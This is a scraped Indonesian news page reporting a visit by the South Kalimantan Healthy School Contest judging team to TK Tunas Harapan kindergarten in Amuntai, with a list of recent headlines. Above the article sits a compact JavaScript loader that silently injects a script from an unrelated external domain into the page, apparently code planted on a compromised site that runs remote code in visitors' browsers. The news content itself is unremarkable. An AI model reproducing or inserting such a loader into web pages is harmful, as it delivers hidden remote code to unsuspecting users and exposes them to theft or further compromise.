(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Tim LSS Kalsel Kunjungi TK Tunas Harapan


AMUNTAI, Tim penilai Lomba Sekolah Sehat (LSS) tingkat Provinsi Kalsel mendatangi TK Tunas Harapan, Kecamantan Amuntai Tengah, Kabupaten HSU, Rabu (23/10).

Kedatangan tim dalam rangka penilaian kebersihan sarana/prasarana kelas, ruang guru, toilet, air bersih, tempat cuci tangan, kondisi tempat sampah, dan UKS.

Ketua TP PKK HSU Hj Anisah Rasyidah mengatakan, penilaian lomba UKS bukanlah tujuan akhir, akan tetapi tujuan utamanya adalah agar TK Tunas Harapan dapat mengikuti tujuan dari pelaksanaan UKS itu sendiri.

TK Tunas Harapan harus mampu melaksanakan pendidikan kesehatan di lingkungan sekolahnya dengan melakukan tindakan pencegahan agar peserta didik terhindar dari penyakit.

Usaha Kesehatan Sekolah (UKS) merupakan wahana proses belajar mengajar untuk meningkatkan kemampuan hidup sehat dan derajat kesehatan anak didik sedini mungkin dalam keseharian.

“Saya bersyukur TK Tunas Harapan bisa mewakili Kabupaten Hulu Sungai Utara dalam perlombaan UKS tingkat Provinsi Kalimantan Selatan,” ujar Anisah.

Sementara itu, Dwi Endah Saraswati. Ketua Tim Penilai Lomba Sekolah Sehat menyebut, kegiatan ini merupakan penilaian untuk mewujudkan sekolah sehat dan bersih, perilaku hidup bersih dan sehat di lingkungan sekolah dan masyarakat.

Lebih lanjut, dikatakannya, di dalam sekolah harus ada pembinaan lingkungan kesehatan, agar tercipta lingkungan sekolah yang sehat.

“Lingkungannya harus bersih, ruang kelasnya bersih, dan kantinnya juga harus bersih, dengan sekolah yang bersih dan sehat akan membuat gairah belajar akan semakin meningkat,” pungkasnya.

Tim penilai LSS Provinsi Kalsel juga menyambangi sekolah lainnya yakni SMK Negeri 2 Amuntai, SMP IT Ihsanul Amal Alabio dan SD Negeri Babirik. (dew)

Reporter : Dew
Editor : Bie


Desy Arfianty

Recent Posts

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

1 jam ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

2 jam ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

15 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

16 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

16 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

17 jam ago

This website uses cookies.